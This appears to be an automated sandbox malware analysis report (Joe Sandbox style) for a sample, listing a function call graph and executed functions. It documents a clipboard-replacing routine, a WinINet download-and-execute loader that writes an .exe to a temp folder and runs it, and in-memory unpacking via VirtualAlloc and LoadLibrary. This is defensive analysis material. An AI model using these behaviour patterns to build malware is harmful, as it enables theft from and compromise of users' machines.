65701 43f9fd GetLastError 65700->65701 65758 42eab3 20 API calls 2 library calls 65701->65758 65702->65697 65759 43cdbf 65704->65759 65707 43d0a7 65777 43979e 65707->65777 65708 43d08e 65791 42ead6 20 API calls __dosmaperr 65708->65791 65711 43d0ac 65712 43d0b5 65711->65712 65713 43d0cc 65711->65713 65793 42ead6 20 API calls __dosmaperr 65712->65793 65790 43cd2a CreateFileW 65713->65790 65717 43d0ba 65794 42eae9 20 API calls __dosmaperr 65717->65794 65718 43d105 65720 43d182 GetFileType 65718->65720 65722 43d157 GetLastError 65718->65722 65795 43cd2a CreateFileW 65718->65795 65721 43d18d GetLastError 65720->65721 65724 43d1d4 65720->65724 65797 42eab3 20 API calls 2 library calls 65721->65797 65796 42eab3 20 API calls 2 library calls 65722->65796 65799 4396e7 21 API calls 3 library calls 65724->65799 65726 43d19b CloseHandle 65728 43d093 65726->65728 65729 43d1c4 65726->65729 65792 42eae9 20 API calls __dosmaperr 65728->65792 65798 42eae9 20 API calls __dosmaperr 65729->65798 65731 43d14a 65731->65720 65731->65722 65733 43d1f5 65735 43d241 65733->65735 65800 43cf3b 169 API calls 4 library calls 65733->65800 65734 43d1c9 65734->65728 65739 43d26e 65735->65739 65801 43cadd 167 API calls 4 library calls 65735->65801 65738 43d267 65738->65739 65740 43d27f 65738->65740 65802 4335ed 29 API calls 2 library calls 65739->65802 65742 43d029 65740->65742 65743 43d2fd CloseHandle 65740->65743 65742->65676 65803 43cd2a CreateFileW 65743->65803 65745 43d328 65746 43d332 GetLastError 65745->65746 65747 43d277 65745->65747 65804 42eab3 20 API calls 2 library calls 65746->65804 65747->65742 65749 43d33e 65805 4398b0 21 API calls 3 library calls 65749->65805 65751->65686 65752->65697 65753->65691 65754->65697 65755->65689 65756->65697 65757->65698 65758->65699 65760 43cde0 65759->65760 65761 43cdfa 65759->65761 65760->65761 65813 42eae9 20 API calls __dosmaperr 65760->65813 65806 43cd4f 65761->65806 65764 43cdef 65814 42a5bd 26 API calls _Deallocate 65764->65814 65766 43ce32 65767 43ce61 65766->65767 65815 42eae9 20 API calls __dosmaperr 65766->65815 65770 43ceb4 65767->65770 65817 42ffff 26 API calls 2 library calls 65767->65817 65770->65707 65770->65708 65771 43ceaf 65771->65770 65773 43cf2e 65771->65773 65772 43ce56 65816 42a5bd 26 API calls _Deallocate 65772->65816 65818 42a5ea 11 API calls _Atexit 65773->65818 65776 43cf3a 65778 4397aa BuildCatchObjectHelperInternal 65777->65778 65821 42e40d EnterCriticalSection 65778->65821 65781 4397d6 65825 43957d 21 API calls 3 library calls 65781->65825 65783 439821 __fread_nolock 65783->65711 65784 4397b1 65784->65781 65786 439844 EnterCriticalSection 65784->65786 65788 4397f8 65784->65788 65785 4397db 65785->65788 65826 4396c4 EnterCriticalSection 65785->65826 65786->65788 65789 439851 LeaveCriticalSection 65786->65789 65822 4398a7 65788->65822 65789->65784 65790->65718 65791->65728 65792->65742 65793->65717 65794->65728 65795->65731 65796->65728 65797->65726 65798->65734 65799->65733 65800->65735 65801->65738 65802->65747 65803->65745 65804->65749 65805->65747 65808 43cd67 65806->65808 65807 43cd82 65807->65766 65808->65807 65819 42eae9 20 API calls __dosmaperr 65808->65819 65810 43cda6 65820 42a5bd 26 API calls _Deallocate 65810->65820 65812 43cdb1 65812->65766 65813->65764 65814->65761 65815->65772 65816->65767 65817->65771 65818->65776 65819->65810 65820->65812 65821->65784 65827 42e455 LeaveCriticalSection 65822->65827 65824 4398ae 65824->65783 65825->65785 65826->65788 65827->65824 65828 43412a 65829 434136 BuildCatchObjectHelperInternal 65828->65829 65830 434142 65829->65830 65831 434159 65829->65831 65862 42eae9 20 API calls __dosmaperr 65830->65862 65841 42cb1f EnterCriticalSection 65831->65841 65834 434147 65863 42a5bd 26 API calls _Deallocate 65834->65863 65835 434169 65842 4341a6 65835->65842 65838 434152 __fread_nolock 65839 434175 65864 43419c LeaveCriticalSection __fread_nolock 65839->65864 65841->65835 65843 4341b4 65842->65843 65844 4341ce 65842->65844 65875 42eae9 20 API calls __dosmaperr 65843->65875 65865 432928 65844->65865 65847 4341d7 65872 4347f3 65847->65872 65848 4341b9 65876 42a5bd 26 API calls _Deallocate 65848->65876 65852 4342db 65854 4342e8 65852->65854 65858 43428e 65852->65858 65853 43425f 65856 43427c 65853->65856 65853->65858 65878 42eae9 20 API calls __dosmaperr 65854->65878 65877 4344bf 31 API calls 4 library calls 65856->65877 65859 4341c4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65858->65859 65879 43433b 30 API calls 2 library calls 65858->65879 65859->65839 65860 434286 65860->65859 65862->65834 65863->65838 65864->65838 65866 432934 65865->65866 65867 432949 65865->65867 65880 42eae9 20 API calls __dosmaperr 65866->65880 65867->65847 65869 432939 65881 42a5bd 26 API calls _Deallocate 65869->65881 65871 432944 65871->65847 65882 434670 65872->65882 65874 4341f3 65874->65852 65874->65853 65874->65859 65875->65848 65876->65859 65877->65860 65878->65859 65879->65859 65880->65869 65881->65871 65883 43467c BuildCatchObjectHelperInternal 65882->65883 65884 434684 65883->65884 65887 43469c 65883->65887 65917 42ead6 20 API calls __dosmaperr 65884->65917 65886 434750 65922 42ead6 20 API calls __dosmaperr 65886->65922 65887->65886 65892 4346d4 65887->65892 65888 434689 65918 42eae9 20 API calls __dosmaperr 65888->65918 65891 434755 65923 42eae9 20 API calls __dosmaperr 65891->65923 65907 4396c4 EnterCriticalSection 65892->65907 65895 43475d 65924 42a5bd 26 API calls _Deallocate 65895->65924 65896 4346da 65898 434713 65896->65898 65899 4346fe 65896->65899 65908 434775 65898->65908 65919 42eae9 20 API calls __dosmaperr 65899->65919 65900 434691 __fread_nolock 65900->65874 65903 43470e 65921 434748 LeaveCriticalSection __wsopen_s 65903->65921 65904 434703 65920 42ead6 20 API calls __dosmaperr 65904->65920 65907->65896 65925 439941 65908->65925 65910 434787 65911 4347a0 SetFilePointerEx 65910->65911 65912 43478f 65910->65912 65914 434794 65911->65914 65915 4347b8 GetLastError 65911->65915 65938 42eae9 20 API calls __dosmaperr 65912->65938 65914->65903 65939 42eab3 20 API calls 2 library calls 65915->65939 65917->65888 65918->65900 65919->65904 65920->65903 65921->65900 65922->65891 65923->65895 65924->65900 65926 439963 65925->65926 65927 43994e 65925->65927 65931 439988 65926->65931 65942 42ead6 20 API calls __dosmaperr 65926->65942 65940 42ead6 20 API calls __dosmaperr 65927->65940 65930 439953 65941 42eae9 20 API calls __dosmaperr 65930->65941 65931->65910 65932 439993 65943 42eae9 20 API calls __dosmaperr 65932->65943 65935 43995b 65935->65910 65936 43999b 65944 42a5bd 26 API calls _Deallocate 65936->65944 65938->65914 65939->65914 65940->65930 65941->65935 65942->65932 65943->65936 65944->65935 65945 a5003c 65946 a50049 65945->65946 65960 a50e0f SetErrorMode SetErrorMode 65946->65960 65951 a50265 65952 a502ce VirtualProtect 65951->65952 65954 a5030b 65952->65954 65953 a50439 VirtualFree 65958 a505f4 LoadLibraryA 65953->65958 65959 a504be 65953->65959 65954->65953 65955 a504e3 LoadLibraryA 65955->65959 65957 a508c7 65958->65957 65959->65955 65959->65958 65961 a50223 65960->65961 65962 a50d90 65961->65962 65963 a50dad 65962->65963 65964 a50dbb GetPEB 65963->65964 65965 a50238 VirtualAlloc 65963->65965 65964->65965 65965->65951 65966 4023ba 65967 402581 PostQuitMessage 65966->65967 65968 4023ce 65966->65968 65969 40257f 65967->65969 65970 4023d5 DefWindowProcW 65968->65970 65971 4023ec 65968->65971 65970->65969 65971->65969 65972 402a14 167 API calls 65971->65972 65972->65969 65973 40fc2b 65974 40fc37 BuildCatchObjectHelperInternal 65973->65974 66002 410018 65974->66002 65976 40fd91 66023 4104f3 4 API calls 2 library calls 65976->66023 65977 40fc3e 65977->65976 65981 40fc68 65977->65981 65979 40fd98 66024 42ffe9 28 API calls _Atexit 65979->66024 65990 40fca7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65981->65990 66017 42fd0e 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 65981->66017 65982 40fd9e 66025 42ff9b 28 API calls _Atexit 65982->66025 65985 40fc81 65987 40fc87 65985->65987 66018 42fcb2 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 65985->66018 65986 40fda6 65989 40fd08 66013 41060d 65989->66013 65990->65989 66019 42a386 167 API calls 4 library calls 65990->66019 65993 40fd0e 65994 40fd23 65993->65994 66020 410643 GetModuleHandleW 65994->66020 65996 40fd2a 65996->65979 65997 40fd2e 65996->65997 65998 40fd37 65997->65998 66021 42ff8c 28 API calls _Atexit 65997->66021 66022 4101a7 13 API calls 2 library calls 65998->66022 66001 40fd3f 66001->65987 66003 410021 66002->66003 66026 41079b IsProcessorFeaturePresent 66003->66026 66005 41002d 66027 428847 10 API calls 3 library calls 66005->66027 66007 410032 66012 410036 66007->66012 66028 4317c1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 66007->66028 66009 41003f 66010 41004d 66009->66010 66029 428870 8 API calls 3 library calls 66009->66029 66010->65977 66012->65977 66030 426850 66013->66030 66016 410633 66016->65993 66017->65985 66018->65990 66019->65989 66020->65996 66021->65998 66022->66001 66023->65979 66024->65982 66025->65986 66026->66005 66027->66007 66028->66009 66029->66012 66031 410620 GetStartupInfoW 66030->66031 66031->66016 66032 402bcd RegCreateKeyExW 66033 402bfb RegSetValueExW 66032->66033 66034 402c0f 66032->66034 66033->66034 66035 402c14 RegCloseKey 66034->66035 66036 402c1d 66034->66036 66035->66036 66037 4332fe 66038 43330b 66037->66038 66042 433323 66037->66042 66087 42eae9 20 API calls __dosmaperr 66038->66087 66040 433310 66088 42a5bd 26 API calls _Deallocate 66040->66088 66043 43331b 66042->66043 66044 43337e 66042->66044 66089 434ced 21 API calls 2 library calls 66042->66089 66045 432928 __fread_nolock 26 API calls 66044->66045 66047 433396 66045->66047 66057 432e36 66047->66057 66049 43339d 66049->66043 66050 432928 __fread_nolock 26 API calls 66049->66050 66051 4333c9 66050->66051 66051->66043 66052 432928 __fread_nolock 26 API calls 66051->66052 66053 4333d7 66052->66053 66053->66043 66054 432928 __fread_nolock 26 API calls 66053->66054 66055 4333e7 66054->66055 66056 432928 __fread_nolock 26 API calls 66055->66056 66056->66043 66058 432e42 BuildCatchObjectHelperInternal 66057->66058 66059 432e62 66058->66059 66060 432e4a 66058->66060 66062 432f28 66059->66062 66066 432e9b 66059->66066 66156 42ead6 20 API calls __dosmaperr 66060->66156 66163 42ead6 20 API calls __dosmaperr 66062->66163 66063 432e4f 66157 42eae9 20 API calls __dosmaperr 66063->66157 66068 432eaa 66066->66068 66069 432ebf 66066->66069 66067 432f2d 66164 42eae9 20 API calls __dosmaperr 66067->66164 66158 42ead6 20 API calls __dosmaperr 66068->66158 66090 4396c4 EnterCriticalSection 66069->66090 66071 432eb7 66165 42a5bd 26 API calls _Deallocate 66071->66165 66074 432ec5 66076 432ee1 66074->66076 66077 432ef6 66074->66077 66075 432eaf 66159 42eae9 20 API calls __dosmaperr 66075->66159 66160 42eae9 20 API calls __dosmaperr 66076->66160 66091 432f49 66077->66091 66079 432e57 __fread_nolock 66079->66049 66083 432ee6 66161 42ead6 20 API calls __dosmaperr 66083->66161 66084 432ef1 66162 432f20 LeaveCriticalSection __wsopen_s 66084->66162 66087->66040 66088->66043 66089->66044 66090->66074 66092 432f5b 66091->66092 66097 432f73 66091->66097 66175 42ead6 20 API calls __dosmaperr 66092->66175 66094 4332dd 66193 42ead6 20 API calls __dosmaperr 66094->66193 66095 432f60 66176 42eae9 20 API calls __dosmaperr 66095->66176 66097->66094 66100 432fb8 66097->66100 66099 4332e2 66194 42eae9 20 API calls __dosmaperr 66099->66194 66102 432fc3 66100->66102 66103 432f68 66100->66103 66107 432ff3 66100->66107 66177 42ead6 20 API calls __dosmaperr 66102->66177 66103->66084 66104 432fd0 66195 42a5bd 26 API calls _Deallocate 66104->66195 66106 432fc8 66178 42eae9 20 API calls __dosmaperr 66106->66178 66110 43300c 66107->66110 66111 433032 66107->66111 66112 43304e 66107->66112 66110->66111 66116 433019 66110->66116 66179 42ead6 20 API calls __dosmaperr 66111->66179 66182 4336c7 21 API calls 3 library calls 66112->66182 66115 433037 66180 42eae9 20 API calls __dosmaperr 66115->66180 66166 43d385 66116->66166 66117 433065 66120 43348a _free 20 API calls 66117->66120 66123 43306e 66120->66123 66121 4331b7 66124 43322d 66121->66124 66128 4331d0 GetConsoleMode 66121->66128 66122 43303e 66181 42a5bd 26 API calls _Deallocate 66122->66181 66126 43348a _free 20 API calls 66123->66126 66127 433231 ReadFile 66124->66127 66129 433075 66126->66129 66130 4332a5 GetLastError 66127->66130 66131 43324b 66127->66131 66128->66124 66132 4331e1 66128->66132 66133 43309a 66129->66133 66134 43307f 66129->66134 66135 4332b2 66130->66135 66136 433209 66130->66136 66131->66130 66137 433222 66131->66137 66132->66127 66138 4331e7 ReadConsoleW 66132->66138 66185 43480e 66133->66185 66183 42eae9 20 API calls __dosmaperr 66134->66183 66191 42eae9 20 API calls __dosmaperr 66135->66191 66153 433049 __fread_nolock 66136->66153 66188 42eab3 20 API calls 2 library calls 66136->66188 66149 433270 66137->66149 66150 433287 66137->66150 66137->66153 66138->66137 66139 433203 GetLastError 66138->66139 66139->66136 66140 43348a _free 20 API calls 66140->66103 66145 433084 66184 42ead6 20 API calls __dosmaperr 66145->66184 66146 4332b7 66192 42ead6 20 API calls __dosmaperr 66146->66192 66189 432c65 31 API calls 3 library calls 66149->66189 66152 43329e 66150->66152 66150->66153 66190 432aa5 29 API calls __fread_nolock 66152->66190 66153->66140 66155 4332a3 66155->66153 66156->66063 66157->66079 66158->66075 66159->66071 66160->66083 66161->66084 66162->66079 66163->66067 66164->66071 66165->66079 66167 43d392 66166->66167 66168 43d39f 66166->66168 66196 42eae9 20 API calls __dosmaperr 66167->66196 66171 43d3ab 66168->66171 66197 42eae9 20 API calls __dosmaperr 66168->66197 66170 43d397 66170->66121 66171->66121 66173 43d3cc 66198 42a5bd 26 API calls _Deallocate 66173->66198 66175->66095 66176->66103 66177->66106 66178->66104 66179->66115 66180->66122 66181->66153 66182->66117 66183->66145 66184->66153 66186 434775 __fread_nolock 28 API calls 66185->66186 66187 434824 66186->66187 66187->66116 66188->66153 66189->66153 66190->66155 66191->66146 66192->66153 66193->66099 66194->66104 66195->66103 66196->66170 66197->66173 66198->66170

                                                            Executed Functions

                                                            Function 004016E3 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150clipboardsleepmemoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • __EH_prolog3_GS.LIBCMT ref: 004016EA
                                                            • Sleep.KERNEL32(000011EB,0000004C), ref: 004016F4
                                                              • Part of subcall function 0040CC35: _strlen.LIBCMT ref: 0040CC4C
                                                            • OpenClipboard.USER32(00000000), ref: 00401721
                                                            • GetClipboardData.USER32(00000001), ref: 00401731
                                                            • GlobalLock.KERNEL32(00000000), ref: 00401740
                                                            • _strlen.LIBCMT ref: 0040174D
                                                            • _strlen.LIBCMT ref: 0040177C
                                                            • _strlen.LIBCMT ref: 004018C0
                                                            • EmptyClipboard.USER32 ref: 004018D6
                                                            • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
                                                            • GlobalLock.KERNEL32(00000000), ref: 00401901
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040190D
                                                            • SetClipboardData.USER32(00000001,00000000), ref: 00401916
                                                            • GlobalFree.KERNEL32(00000000), ref: 0040191D
                                                            • CloseClipboard.USER32 ref: 00401941
                                                            • Sleep.KERNEL32(000002C7), ref: 0040194C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                            • String ID: i
                                                            • API String ID: 1583243082-3865851505
                                                            • Opcode ID: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                            • Instruction ID: e8206cc808b01b97a457829c5c6b97d93370119956ebdbcfeaa79ca2656f34e0
                                                            • Opcode Fuzzy Hash: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                            • Instruction Fuzzy Hash: EE51E431D00344DBE3119BA4ED46BAD7774FF2A306F04523AE805B62B2EB789A85C75D
                                                            Function 00402A14 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134networkfilesynchronizationCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A37
                                                            • InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 00402A4D
                                                            • GetTempPathW.KERNEL32(00000105,?), ref: 00402A69
                                                            • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A7F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402AB8
                                                            • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AF4
                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402B11
                                                            • CloseHandle.KERNEL32(00000000), ref: 00402B27
                                                            • ShellExecuteExW.SHELL32(?), ref: 00402B88
                                                            • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B9D
                                                            • CloseHandle.KERNEL32(?), ref: 00402BA9
                                                            • InternetCloseHandle.WININET(00000000), ref: 00402BB2
                                                            • InternetCloseHandle.WININET(00000000), ref: 00402BB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                            • String ID: .exe$<$ShareScreen
                                                            • API String ID: 3323492106-493228180
                                                            • Opcode ID: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                            • Instruction ID: d8cef6b8be2db64f00d3760719452557403e9faa7f5bbaccd6a49820079d0072
                                                            • Opcode Fuzzy Hash: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                            • Instruction Fuzzy Hash: 3E41537190021CAEEB20DF50DD85FEAB7BCFF05745F0080FAA545A2190DEB49E858FA4
                                                            Function 00869ED6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00869EFE
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 00869F1E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp, Offset: 00869000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_869000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: 3374acbeb7efbd02cc1596fc2621e4d2db35c8ad62b51c486cf68c661be67ad6
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: BCF06231100715ABDB207BF9A88DB6A76ECFF49725F120529F686D54C0DBB0E8454661
                                                            Function 00432F49 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 74 432f49-432f59 75 432f73-432f75 74->75 76 432f5b-432f6e call 42ead6 call 42eae9 74->76 78 432f7b-432f81 75->78 79 4332dd-4332ea call 42ead6 call 42eae9 75->79 92 4332f5 76->92 78->79 82 432f87-432fb2 78->82 97 4332f0 call 42a5bd 79->97 82->79 85 432fb8-432fc1 82->85 88 432fc3-432fd6 call 42ead6 call 42eae9 85->88 89 432fdb-432fdd 85->89 88->97 90 432fe3-432fe7 89->90 91 4332d9-4332db 89->91 90->91 95 432fed-432ff1 90->95 96 4332f8-4332fd 91->96 92->96 95->88 99 432ff3-43300a 95->99 97->92 102 433027-433030 99->102 103 43300c-43300f 99->103 107 433032-433049 call 42ead6 call 42eae9 call 42a5bd 102->107 108 43304e-433058 102->108 105 433011-433017 103->105 106 433019-433022 103->106 105->106 105->107 109 4330c3-4330dd 106->109 140 433210 107->140 111 43305a-43305c 108->111 112 43305f-43307d call 4336c7 call 43348a * 2 108->112 113 4330e3-4330f3 109->113 114 4331b1-4331ba call 43d385 109->114 111->112 143 43309a-4330c0 call 43480e 112->143 144 43307f-433095 call 42eae9 call 42ead6 112->144 113->114 117 4330f9-4330fb 113->117 127 43322d 114->127 128 4331bc-4331ce 114->128 117->114 121 433101-433127 117->121 121->114 125 43312d-433140 121->125 125->114 130 433142-433144 125->130 132 433231-433249 ReadFile 127->132 128->127 133 4331d0-4331df GetConsoleMode 128->133 130->114 135 433146-433171 130->135 137 4332a5-4332b0 GetLastError 132->137 138 43324b-433251 132->138 133->127 139 4331e1-4331e5 133->139 135->114 142 433173-433186 135->142 145 4332b2-4332c4 call 42eae9 call 42ead6 137->145 146 4332c9-4332cc 137->146 138->137 147 433253 138->147 139->132 148 4331e7-433201 ReadConsoleW 139->148 141 433213-43321d call 43348a 140->141 141->96 142->114 154 433188-43318a 142->154 143->109 144->140 145->140 151 4332d2-4332d4 146->151 152 433209-43320f call 42eab3 146->152 158 433256-433268 147->158 149 433203 GetLastError 148->149 150 433222-43322b 148->150 149->152 150->158 151->141 152->140 154->114 161 43318c-4331ac 154->161 158->141 165 43326a-43326e 158->165 161->114 169 433270-433280 call 432c65 165->169 170 433287-433292 165->170 179 433283-433285 169->179 172 433294 call 432db5 170->172 173 43329e-4332a3 call 432aa5 170->173 180 433299-43329c 172->180 173->180 179->141 180->179
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                            • Instruction ID: d6ce50a492f9084338ba33edda2eca6d731db0489828e8dd55d9f9b17e416b32
                                                            • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                            • Instruction Fuzzy Hash: 6EC11370E04245AFDB11DFA9D841BAFBBB0BF0D305F08119AE815A7392C3789A41CB69
                                                            Function 0043D05C Relevance: 13.8, APIs: 9, Instructions: 272COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 182 43d05c-43d08c call 43cdbf 185 43d0a7-43d0b3 call 43979e 182->185 186 43d08e-43d099 call 42ead6 182->186 192 43d0b5-43d0ca call 42ead6 call 42eae9 185->192 193 43d0cc-43d115 call 43cd2a 185->193 191 43d09b-43d0a2 call 42eae9 186->191 203 43d37e-43d384 191->203 192->191 201 43d182-43d18b GetFileType 193->201 202 43d117-43d120 193->202 204 43d1d4-43d1d7 201->204 205 43d18d-43d1be GetLastError call 42eab3 CloseHandle 201->205 207 43d122-43d126 202->207 208 43d157-43d17d GetLastError call 42eab3 202->208 210 43d1e0-43d1e6 204->210 211 43d1d9-43d1de 204->211 205->191 219 43d1c4-43d1cf call 42eae9 205->219 207->208 212 43d128-43d155 call 43cd2a 207->212 208->191 215 43d1ea-43d238 call 4396e7 210->215 216 43d1e8 210->216 211->215 212->201 212->208 225 43d23a-43d246 call 43cf3b 215->225 226 43d248-43d26c call 43cadd 215->226 216->215 219->191 225->226 231 43d270-43d27a call 4335ed 225->231 232 43d27f-43d2c2 226->232 233 43d26e 226->233 231->203 235 43d2e3-43d2f1 232->235 236 43d2c4-43d2c8 232->236 233->231 239 43d2f7-43d2fb 235->239 240 43d37c 235->240 236->235 238 43d2ca-43d2de 236->238 238->235 239->240 241 43d2fd-43d330 CloseHandle call 43cd2a 239->241 240->203 244 43d332-43d35e GetLastError call 42eab3 call 4398b0 241->244 245 43d364-43d378 241->245 244->245 245->240
                                                            APIs
                                                              • Part of subcall function 0043CD2A: CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                            • GetLastError.KERNEL32 ref: 0043D170
                                                            • __dosmaperr.LIBCMT ref: 0043D177
                                                            • GetFileType.KERNEL32(00000000), ref: 0043D183
                                                            • GetLastError.KERNEL32 ref: 0043D18D
                                                            • __dosmaperr.LIBCMT ref: 0043D196
                                                            • CloseHandle.KERNEL32(00000000), ref: 0043D1B6
                                                            • CloseHandle.KERNEL32(?), ref: 0043D300
                                                            • GetLastError.KERNEL32 ref: 0043D332
                                                            • __dosmaperr.LIBCMT ref: 0043D339
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                            • String ID:
                                                            • API String ID: 4237864984-0
                                                            • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                            • Instruction ID: 006e68bf3f1d2291baca7e3f3ccd15ce7d6f583b40adfd1c0386b5d8b5644812
                                                            • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                            • Instruction Fuzzy Hash: 70A13632E101049FDF19AF68EC917AE7BA0AF0A324F14115EF805AB3D1D7389D12CB5A
                                                            Function 00A5003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 250 a5003c-a50047 251 a5004c-a50263 call a50a3f call a50e0f call a50d90 VirtualAlloc 250->251 252 a50049 250->252 267 a50265-a50289 call a50a69 251->267 268 a5028b-a50292 251->268 252->251 273 a502ce-a503c2 VirtualProtect call a50cce call a50ce7 267->273 270 a502a1-a502b0 268->270 272 a502b2-a502cc 270->272 270->273 272->270 279 a503d1-a503e0 273->279 280 a503e2-a50437 call a50ce7 279->280 281 a50439-a504b8 VirtualFree 279->281 280->279 283 a505f4-a505fe 281->283 284 a504be-a504cd 281->284 287 a50604-a5060d 283->287 288 a5077f-a50789 283->288 286 a504d3-a504dd 284->286 286->283 292 a504e3-a50505 LoadLibraryA 286->292 287->288 293 a50613-a50637 287->293 290 a507a6-a507b0 288->290 291 a5078b-a507a3 288->291 294 a507b6-a507cb 290->294 295 a5086e-a508be LoadLibraryA 290->295 291->290 296 a50517-a50520 292->296 297 a50507-a50515 292->297 298 a5063e-a50648 293->298 299 a507d2-a507d5 294->299 302 a508c7-a508f9 295->302 300 a50526-a50547 296->300 297->300 298->288 301 a5064e-a5065a 298->301 303 a50824-a50833 299->303 304 a507d7-a507e0 299->304 305 a5054d-a50550 300->305 301->288 306 a50660-a5066a 301->306 307 a50902-a5091d 302->307 308 a508fb-a50901 302->308 314 a50839-a5083c 303->314 309 a507e4-a50822 304->309 310 a507e2 304->310 311 a50556-a5056b 305->311 312 a505e0-a505ef 305->312 313 a5067a-a50689 306->313 308->307 309->299 310->303 315 a5056d 311->315 316 a5056f-a5057a 311->316 312->286 317 a50750-a5077a 313->317 318 a5068f-a506b2 313->318 314->295 319 a5083e-a50847 314->319 315->312 325 a5057c-a50599 316->325 326 a5059b-a505bb 316->326 317->298 320 a506b4-a506ed 318->320 321 a506ef-a506fc 318->321 322 a50849 319->322 323 a5084b-a5086c 319->323 320->321 327 a506fe-a50748 321->327 328 a5074b 321->328 322->295 323->314 333 a505bd-a505db 325->333 326->333 327->328 328->313 333->305
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00A5024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
